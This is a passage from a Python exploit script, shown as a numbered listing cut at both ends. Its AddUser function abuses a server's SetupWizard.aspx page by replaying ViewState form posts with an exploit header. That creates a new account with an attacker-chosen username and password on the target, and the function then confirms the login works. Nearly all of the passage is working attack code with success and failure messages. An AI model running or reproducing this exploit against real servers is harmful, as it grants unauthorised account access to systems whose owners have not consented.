(url, username, password, domain)
| 157 | print("[-] Error in func <DeleteExtension>, error message: " + str(err)) |
| 158 | |
| 159 | def AddUser(url, username, password, domain): |
| 160 | if CheckVersion(url): |
| 161 | try: |
| 162 | initial_request = requests.get(url=url + "/SetupWizard.aspx/", verify=False) |
| 163 | viewstate_1 = re.search(r'value="([^"]+)"', initial_request.text).group(1) |
| 164 | viewgen_1 = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', initial_request.text).group(1) |
| 165 | next_data = {"__EVENTTARGET": '', "__EVENTARGUMENT": '', "__VIEWSTATE": viewstate_1, |
| 166 | "__VIEWSTATEGENERATOR": viewgen_1, |
| 167 | "ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton": "Next"} |
| 168 | next_request = requests.post(url=url + "/SetupWizard.aspx/", headers=exploit_header, data=next_data, verify=False) |
| 169 | exploit_viewstate = re.search(r'value="([^"]+)"', next_request.text).group(1) |
| 170 | exploit_viewgen = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', next_request.text).group(1) |
| 171 | exploit_data = {"__LASTFOCUS": '', "__EVENTTARGET": '', "__EVENTARGUMENT": '', "__VIEWSTATE": exploit_viewstate, |
| 172 | "__VIEWSTATEGENERATOR": exploit_viewgen, "ctl00$Main$wizard$userNameBox": username, |
| 173 | "ctl00$Main$wizard$emailBox": username + f"@{domain}", |
| 174 | "ctl00$Main$wizard$passwordBox": password, "ctl00$Main$wizard$verifyPasswordBox": password, |
| 175 | "ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton": "Next"} |
| 176 | requests.post(url=url + "/SetupWizard.aspx/", headers=exploit_header, data=exploit_data, verify=False) |
| 177 | check_url = url + "/Services/AuthenticationService.ashx/TryLogin" |
| 178 | check_data = f"""["{username}","{password}",null,null,null]""" |
| 179 | check_header = { |
| 180 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36", |
| 181 | "Content-Type": "application/json" |
| 182 | } |
| 183 | check_response = requests.post(url=check_url, data=check_data, headers=check_header, verify=False) |
| 184 | if check_response.ok and "1" in check_response.text: |
| 185 | print(f"[+] {url} Successfully added user. username: {GREEN}{username}{RESET} and password: {GREEN}{password}{RESET}") |
| 186 | else: |
| 187 | print(f"[-] Failed to add user, {url} does not have this vulnerability, please check the network and try again or try to exploit manually") |
| 188 | except Exception as err: |
| 189 | print("[-] Error in func <AddUser>, error message: " + str(err)) |
| 190 | |
| 191 | def CheckVersion(url): |
| 192 | try: |
no test coverage detected